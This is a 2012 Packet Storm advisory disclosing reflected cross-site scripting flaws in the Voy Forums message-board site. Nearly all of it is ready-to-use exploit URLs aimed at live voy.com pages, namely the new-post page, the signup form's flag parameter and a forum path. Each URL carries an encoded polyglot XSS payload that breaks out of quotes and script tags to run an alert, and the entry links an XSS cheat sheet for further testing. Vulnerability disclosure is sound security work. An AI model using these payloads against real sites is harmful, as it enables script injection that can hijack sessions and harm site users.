Voy Forums Cross Site Scripting

2012-01-29T00:00:00
ID PACKETSTORM:109227
Type packetstorm
Reporter Sony
Modified 2012-01-29T00:00:00

Description

                                        
                                            `# Exploit Title: Voy Forums Cross Site Scripting  
# Date: 29.01.2012  
# Author: Sony  
# Software Link: http://www.voy.com  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/01/voy-forums-cross-site-scripting.html  
..................................................................  
  
Interesting, it's very old message boards.  
  
  
http://www.voyager.com/  
  
  
http://voy.com/47252/  
  
  
in the search..  
  
  
http://voy.com/47252/search.html  
  
  
You can made test with xss code:  
  
  
http://ha.ckers.org/xss.html  
  
  
in the newpost:  
  
  
http://voy.com/47252/newpost.html%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
  
in the signup form:  
  
  
http://voy.com/cgi/signup.form?flag=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
  
and here:  
  
  
http://voy.com/35529/2/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
etc..  
`